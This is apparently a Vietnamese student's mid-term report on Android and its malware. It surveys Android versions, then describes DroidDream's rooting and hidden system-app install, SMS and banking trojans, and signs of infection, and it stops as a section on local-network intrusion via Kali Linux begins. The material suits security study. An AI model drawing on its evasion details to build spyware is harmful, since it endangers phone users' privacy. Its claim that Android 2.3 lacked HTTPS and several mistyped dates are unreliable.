SlideShare a Scribd company logo
1 of 50
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG 
VÀ AN NINH MẠNG QUỐC TẾ ATHENA 
BÀI BÁO CÁO GIỮA KÌ 
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH 
CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN 
TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI 
Trang 1 
CBHD: Võ Đỗ Thắng 
SVTT: Lê Trần Xuân Lãnh
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 2 
1. Giới thiệu về Android 
1.1.Android là gì? 
Android là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành cho các thiết bị di động 
có màn hình cảm ứng như điện thoại thông minh và máy tính bảng. Android ra mắt vào năm 2007 
cùng với tuyên bố thành lập Liên minh thiết bị cầm tay mở: một hiệp hội gồm các công ty phần 
cứng, phần mềm, và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di 
động. Chiếc điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008. 
Android có mã nguồn mở và Google phát hành mã nguồn theo Giấy phép Apache. Chính mã 
nguồn mở cùng với một giấy phép không có nhiều ràng buộc đã cho phép các nhà phát triển thiết 
bị, mạng di động và các lập trình viên nhiệt huyết được điều chỉnh và phân phối Android một 
cách tự do. Ngoài ra, Android còn có một cộng đồng lập trình viên đông đảo chuyên viết các ứng 
dụng để mở rộng chức năng của thiết bị, bằng một loại ngôn ngữ lập trình Java có sửa đổi. Vào 
tháng 10 năm 2012, có khoảng 700.000 ứng dụng trên Android, và số lượt tải ứng dụng từ Google 
Play, cửa hàng ứng dụng chính của Android, ước tính khoảng 25 tỷ lượt. 
Những yếu tố này đã giúp Android trở thành nền tảng điện thoại thông minh phổ biến nhất thế 
giới, vượt qua Symbian vào quý 4 năm 2010, và được các công ty công nghệ lựa chọn khi họ cần 
một hệ điều hành không nặng nề, có khả năng tinh chỉnh, và giá rẻ chạy trên các thiết bị công 
nghệ cao thay vì tạo dựng từ đầu. Kết quả là mặc dù được thiết kế để chạy trên điện thoại và máy 
tính bảng, Android đã xuất hiện trên TV, máy chơi game và các thiết bị điện tử khác. Bản chất mở 
của Android cũng khích lệ một đội ngũ đông đảo lập trình viên và những người đam mê sử dụng 
mã nguồn mở để tạo ra những dự án do cộng đồng quản lý. Những dự án này bổ sung các tính 
năng cao cấp cho những người dùng thích tìm tòihoặc đưa Android vào các thiết bị ban đầu chạy 
hệ điều hành khác. 
Android chiếm 75% thị phần điện thoại thông minh trên toàn thế giới vào thời điểm quý 3 năm 
2012, với tổng cộng 500 triệu thiết bị đã được kích hoạt và 1,3 triệu lượt kích hoạt mỗi ngày. Sự 
thành công của hệ điều hành cũng khiến nó trở thành mục tiêu trong các vụ kiện liên quan đến 
bằng phát minh, góp mặt trong cái gọi là "cuộc chiến điện thoại thông minh" giữa các công ty 
công nghệ. 
1.2.Lịch sử phát triển Anroid 
Tháng 7 năm 2005, Google mua lại Android, Inc., một công ty nhỏ mới thành lập có trụ sở ở Palo 
Alto, California, Mỹ. Những nhà đồng sáng lập của Android chuyển sang làm việc tại Google 
gồm có Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập công ty Wildfire 
Communications), Nick Sears (từng là phó chủ tịch của T-Mobile), và Chris White (trưởng nhóm 
thiết kế và phát triển giao diện tại WebTV). Khi đó, có rất ít thông tin về các công việc của 
Android, ngoại trừ việc họ đang phát triển phần mềm cho điện thoại di động. Điều này tạo những 
tin đồn về việc Google có ý định bước vào thị trường điện thoại di động.
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động dựa trên hạt 
nhân Linux, được họ tiếp thị đến các nhà sản xuất thiết bị cầm tay và các nhà mạng trên những 
tiền đề về việc cung cấp một hệ thống mềm dẻo, có khả năng nâng cấp mở rộng cao.[cần dẫn 
nguồn] Một số nguồn tin cho biết trước đó Google đã lên danh sách các thành phần phần cứng và 
các đối tác phần mềm, đồng thời ra hiệu với các nhà mạng rằng họ sẵn sàng hợp tác ở nhiều cấp 
độ khác nhau. Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động 
xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng 
Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang 
nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông in và online cũng sớm có bài 
viết về những tin đồn cho rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu 
Google. Và lại càng có nhiều suy đoán sau bài viết về việc Google đang định nghĩa các đặc tả 
công nghệ và trình diễn các mẫu thử với các nhà sản xuất điện thoại di động và nhà mạng. 
Trang 3 
1.3.Đặt điểm của Android 
1.3.1. Tính mở 
Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp 
dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng 
dụng có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử 
dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người 
dùng. Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã 
được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó 
có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát 
triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo. 
1.3.2. Tính ngang bằng của các ứng dụng. 
Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên 
thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện 
thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ 
các nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể 
ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình 
thích. 
1.3.3. Phá vỡ rào cản phát triển ứng dụng. 
Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp 
thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí 
trên bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể 
xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo 
khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và 
dịch vụ định vị toàn cầu GPS. 
1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng 
Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng 
dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và cho 
phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. 
Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trang 4 
1.4.Các phiên bản của android 
Lịch sử phiên bản của hệ điều hành di động Android bắt đầu với bản Android beta vào tháng 11 
năm 2007. Phiên bản thương mại đầu tiên, Android 1.0, được phát hành vào tháng 9 năm 2008. 
Android đang được phát triển bởi Google và Open Handset Alliance (OHA), và đã có một số bản 
cập nhật cho hệ điều hành này kể từ khi ra mắt. 
Từ tháng 4 2009, phiên bản Android được phát triển dưới tên mã là chủ đề bánh kẹo và phát hành 
theo thứ tự bảng chữ cái: Cupcake (1.5), Donut (1.6), Eclair (2.0–2.1), Froyo (2.2–2.2.3), 
Gingerbread (2.3–2.3.7), Honeycomb (3.0–3.2.6), Ice Cream Sandwich (4.0–4.0.4), Jelly Bean 
(4.1–4.3), và KitKat (4.4). Vào 3 tháng 9 năm 2013, Google công bố rằng 1 tỉ thiết bị đã được 
kích hoạt hiện sử dụng Android OS trên toàn cầu. Bản cập nhật Android gần đây nhất là KitKat 
4.4, nó được phát hành bản thương mại trên thiết bị 22 tháng 11 2013, thông qua cập nhật OTA. 
Bảng thống kê các phiên bản và cập nhật của Android 
Phiên bản API Tên Ngày phát hành 
1.0 Cấp 1 23/9/ 2008 
1.1 Cấp 2 9/2/2009 
1.5 Cấp 3 Cupcake 30/4/2009 
1.6 Cấp 4 Donut 15/9/2009 
2.0 Cấp 5 
Eclair 
26/10/2009 
2.0.1 Cấp 6 3/12/2009 
2.1 Cấp 7 12/1/2010 
2.2 
Cấp 8 Froyo 
20/5/2010 
2.2.1 18/1/2011 
2.2.2 22/1/2011 
2.2.3 21/11/2011 
2.3 
Cấp 9 Gingerbread 
6/12/2010 
2.3.1 12/2010 
2.3.2 1/2011 
2.3.3 
Cấp 10 Gingerbread 
9/2/2011 
2.3.4 28/4/2011 
2.3.5 25/7/2011 
2.3.6 2/9/2011 
2.3.7 21/9/2011 
3.0 Cấp 11 
Honeycomb 
22/2/2011 
3.1 Cấp 12 10/5/2011 
3.2 
Cấp 13 
15/7/2011 
3.2.1 20/9/2011 
3.2.2 30/8/2011 
3.2.3
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
3.2.4 12/2011 
3.2.5 1/2012 
3.2.6 2/1012 
4.0 
Trang 5 
Cấp 14 
Ice Cream 
Sandwich 
19/10/2011 
4.0.1 21/10/2011 
4.0.2 28/11/2011 
4.0.3 
Cấp 15 
16/12/2011 
4.0.4 29/3/2012 
4.1 
Cấp 16 Jelly Bean 
9/7/2012 
4.1.1 23/7/2012 
4.1.2 9/10/2012 
4.2 
Cấp 17 
13/11/2012 
4.2.1 27/11/2012 
4.2.2 11/2/2013 
4.3 
Cấp 18 
24/7/1013 
4.3.1 3/10/2013 
4.4 
Cấp 19 KitKat 
31/10/2013 
4.4.1 5/12/2013 
4.4.2 9/12/2013 
4.4.3 2/6/2014 
4.4.4 19/6/2014 
1.5.Tỷ lệ sử dụng các phiên bản android 
Phần lớn các thiết bị Android cho tới nay vẫn chạy hệ điều hành phiên bản 4.1.x Jelly Bean được 
phát hành ngày 9 tháng 7 năm 2012 nhờ tính ổn định và hỗ trợ tốt các máy có cấu hình thấp cùng 
với các phiên bản 4.x khác. Bên cạnh đó các thiết bị Android vẫn còn sử dụng các phiên bản cũ 
hơn là 2.3 Gingerbread phát hành ngày 6 tháng 12 năm 2010. 
Tỷ lệ sử dụng các phiên bản khác nhau tính đến ngày 20 tháng 7 năm 2014
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
1.6.So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich): 
Android 2.3, tên mã là Gingerbread được phát hành vào ngày 6 tháng 12 năm 2010 và là một bản 
nâng cấp của Android v2.2 Froyo. Các phiên bản 2.3 được thiết kế đặc biệt cho điện thoại thông minh, 
nó được coi là một trong những phiên bản phổ biến nhất của Android cho điện thoại thông minh. 
Ngoài bố trí đã có sẵn trên Froyo, công ty cung cấp các thay đổi như giao diện người dùng được cập 
nhật, tăng tốc độ và sự đơn giản, hỗ trợ cho màn hình lớn hơn và độ phân giải cao, hỗ trợ cho hệ thống 
điện thoại SIP VOIP, bàn phím ảo nhanh hơn và trực quan hơn, chức năng sao chép dán nâng cao, hỗ 
trợ NFC, hiệu ứng âm thanh mới, quản lý download mới, hỗ trợ nhiều camera, hỗ trợ xem video 
WebM/VP8 và AAC mã hóa âm thanh, cải thiện quản lý điện năng, chuyển từ YAFFS đến ext4 trên 
các thiết bị mới hơn, âm thanh, đồ họa và cải tiến đầu vào cho các nhà phát triển trò chơi, đồng thời 
thu gom rác thải và hỗ trợ cho các cảm biến nhiều hơn. Công ty cũng vận chuyển một cập nhật nhỏ 
cho Gingerbread theo phiên bản 2.3.3-2.3.7. Những bản cập nhật được cung cấp tính năng mới như: 
hỗ trợ cho giọng nói hoặc video chat, mở cửa phụ kiện hỗ trợ thư viện, cải tiến để ứng dụng gmail, 
hình ảnh động bóng cho danh sách cuộn, cải tiến phần mềm máy ảnh và cải thiện hiệu quả pin. 
Android 4.0 Ice Cream Sandwich đã được công khai phát hành vào ngày 19 Tháng 10 năm 2011. Các 
Android 4.0 thật sự là một sự là một bản nâng cấp của 2.3 Gingerbread và được cung cấp một loạt 
các tính năng mới. Android cũng đã có phiên bản 3.0, chỉ dành cho máy tính bảng. Phiên bản này về 
cơ bản là một sự kết hợp của Android 2.3.x và Android 3.x. Công ty cung cấp các tính năng cập nhật 
như: nút mềm, widgets, dễ dàng để tạo thư mục mới, cải thiện thư thoại trực quan, chức năng pinch-to- 
zoom, chụp ảnh màn hình, bàn phím được cải thiện, khả năng truy cập các ứng dụng từ lockscreen, 
tính năng mở khóa bằng nhận diện khuôn mặt, trình duyệt web theo thẻ, tự động đồng bộ hóa trình 
duyệt chrome đánh dấu, kiểu chữ mới cho giao diện người dùng, cải thiện ứng dụng máy ảnh, được 
xây dựng trong biên tập ảnh, bố trí bộ sưu tập mới, ứng dụng tích hợp với mạng xã hội, cập nhật trạng 
Trang 6
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
thái và hình ảnh hi-res, khả năng tương thích NFC, tăng tốc phần cứng, quản lý wifi và quay video 
1080p 
1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt 
Android 2.3 Android 4.0 
Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel và 
cho không gian người sử dụng 
Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và 
cho không gian người sử dụng 
Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB 
Trang 7 
Màn hình: 
- Màn hình phải có kích cỡ ít nhất 2,5 inch 
- Mật độ phải được ít nhất 100 dpi 
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779 
(16:9) 
- Công nghệ màn hình được sử dụng là 
công nghệ “ Square pixels” 
Màn hình: 
- Màn hình phải có kích cỡ ít nhất 
426x320 
- Mật độ phải được ít nhất 100 dpi 
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85 
(16:9) 
Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý 
Các API Android bao gồm trình quản lý 
download các ứng dụng có thể sử dụng để tải dữ 
liệu.Trình quản lí download phải có khả năng tải 
tập tin có dung lượng ít nhất 55 MB 
Các API Android bao gồm trình quản lý 
download các ứng dụng có thể sử dụng để tải dữ 
liệu.Trình quản lí download phải có khả năng tải 
tập tin có dung lượng ít nhất 100 MB 
1.6.2. Sự khác nhau về giao diện 
Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm 
ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý 
các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập 
tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản 
hồi rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển 
và cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của 
người dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy 
theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như đang 
điều khiển vô-lăng. 
Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các 
thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn. 
Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động 
như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình 
chính. Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù 
giao diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp 
đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có 
trên Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn 
hình chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng 
hạn.Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi 
của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. 
Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết 
nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan 
trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián 
đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể 
nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung 
theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở 
ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi. 
Android 2.3 Android 4.0 
Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn 
Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Menu 
Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà 
không cần mở ứng dụng 
Trang 8 
1.6.3. Sự khác nhau về tính năng 
Android 2.3 Android 4.0 
Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet 
Chỉ có thể xóa tất các các thông báo cùng lúc 
trên trình quản lý 
Chỉ có thể xóa riêng rẽ các thông báo cùng lúc 
trên trình quản lý 
Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị 
khóa 
Có thể thực hiện thêm 1 số tính năng khi màn 
hình bị khoái ngoài trả lời , ngắt cuộc gọi như
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
gửi tin nhắn 
Không có tính năng mở khóa màn hình nhận 
diện khuôn mặt 
Có tính năng mở khóa màn hình nhận diện 
khuôn mặt 
Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện 
được tất cả các camera trên thiết bị 
Trang 9 
1.6.4. Sự khác nhau về giao thức mạng 
Android 2.3 Android 4.0 
Không hỗ trợ giao thức https Hỗ trợ giao thức https 
2. Nghiên cứu về mã độc trong mỗi trường android 
2.1.Malware là gì? 
Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính 
được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều 
hành cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một 
cách nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó.
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các 
máy tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại 
không nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần 
mềm độc hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói 
về vấn đề này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: 
“Malware trên Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi 
đã phát hiện ra ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi 
MYOURNET, Kingmall2010, we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên 
Android Market, mà hầu hết các ứng dụng đó đều chứa mã độc”. 
Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám 
chương trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần 
mềm độc hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 
2012, Kaspersky Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động 
mới mỗi tháng. Nhìn chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến 
nhiều tăng hơn tám lần. 
Trang 10 
2.2.Phân loại 
Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng: 
- SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến 
các số điện thoại được đánh giá cao. 
- Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại 
khác hoặc ăn cắp dữ liệu cá nhân của người dùng. 
- Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân, 
chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51% 
các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần 
mềm độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet 
Security, SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn 
cho người sử dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân 
hàng trên di động thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp. 
Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những 
cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng 
ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là 
một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất 
của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất 
của phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được 
vào Google Play cũng như kho ứng dụng của Apple. 
Trang 11 
2.3.Cơ chế hoạt động của Malware 
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware 
DroidDream. Malware này hoạt động qua 2 giai đoạn: 
Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng 
chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của 
bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. 
Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một giấy phép đặc biệt cho phép quyền 
uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm 
tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Một khi DroidDream chiếm 
được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, 
DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống 
này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. 
Nghiên cứu cài đặt HĐH Android trên các thiết bị laptop, smartphone.Không giống như giai đoạn 
đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng 
dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể 
biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các 
công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng 
thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó 
khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. 
2.4.Mục đích của Malware DroidDream 
DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của 
con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự 
động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến 
đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS có khả năng tự gửi tin 
nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng 
tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác 
là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân 
hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware 
này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn 
đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì 
vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của 
người dùng hệ điều hành này. 
2.5.Dấu hiệu bị nhiễm các phần mềm độc hại 
Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành 
động khác thường và bạn không thể thay đổi được bất kỳ điều gì. 
- Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu 
về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự 
động được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển 
giao thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu. 
- Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của 
việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi 
bạn đã khởi động lại thiết bị mà các vấn đề không được giảm bớt. 
- Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền 
trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn. 
3. Xâm nhập android qua mạng local 
3.1.Giới thiệu về Kali Linux 
Trong những năm qua BackTrack là hệ điều hành được sử dụng nhiều nhất bởi các chuyên gia 
đánh giá bảo mật. BackTrack bắt đầu xuất hiện vào năm 2006 và trong 7 năm qua nó đã không 
ngừng cải tiến để đạt được một vị trí nhất định trong cộng đồng bảo mật trên khắp toàn thế giới. 
Vì vậy, ngày nay thật khó để tìm thấy một người nào đó quan tâm đến an toàn thông tin mà 
Trang 12 
chưa từng nghe về BackTrack. 
Tháng 3 năm 2013, Offensive Security đã tiến thêm một bước mới khi công bố phiên bản tiến 
hóa của hệ điều hành BackTrack, tên của nó là Kali (được xem như phiên bản BackTrack 6), Kali 
là tên nữ thần của người Hindu, hàm ý sự biến đổi và khả năng hủy diệt hay có lẽ là tên một môn 
võ thuật của người Philippine ... 
Để qua một bên chuyện tên với tuổi, Kali Linux là một OS rất hữu ích đối với những chuyên 
gia đánh giá bảo mật, một OS tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kỳ 
một chuyên gia đánh giá bảo mật nào cũng cần sử dụng đến khi tác nghiệp. 
- Ưu điểm và Nhược điểm: 
Đối với những người chưa biết BackTrack, nói một cách ngắn gọn BackTrack là một bản 
phân phối Linux dựa trên nền tảng hệ điều hành Ubuntu, với nhiều công cụ bảo mật được phân 
loại rõ ràng để sử dụng.
LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 
3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian 
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần 
mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập 
nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các 
công cụ Penetration Test là một yêu cầu vô cùng quan trọng. 
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. 
Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó 
cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các 
công cụ. 
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. 
Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. 
Trang 13 
3.1.2. Hỗ trợ mạng không dây tốt hơn 
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho 
một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu 
cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. 
